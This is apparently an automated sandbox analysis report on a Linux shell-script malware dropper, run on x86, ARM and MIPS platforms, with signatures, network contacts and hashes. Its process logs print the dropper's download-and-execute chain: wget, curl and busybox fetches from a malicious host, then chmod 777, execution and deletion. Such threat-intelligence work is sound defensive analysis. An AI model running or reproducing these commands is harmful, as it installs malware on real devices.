Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-dqfc1s1ncm
Target fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh
SHA256 fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643

Threat Level: Shows suspicious behavior

The file fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 03:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 03:12

Reported

2024-11-25 03:15

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 89.187.167.39:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 03:12

Reported

2024-11-25 03:15

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

2s

Command Line

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 03:12

Reported

2024-11-25 03:15

Platform

debian9-mipsbe-20240611-en

Max time kernel

135s

Max time network

144s

Command Line

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW /usr/bin/curl N/A

Processes

/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/bin/chmod

[chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

[./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/bin/rm

[rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 03:12

Reported

2024-11-25 03:15

Platform

debian9-mipsel-20240729-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW /usr/bin/curl N/A

Processes

/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh

[/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/bin/chmod

[chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

[./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/bin/rm

[rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97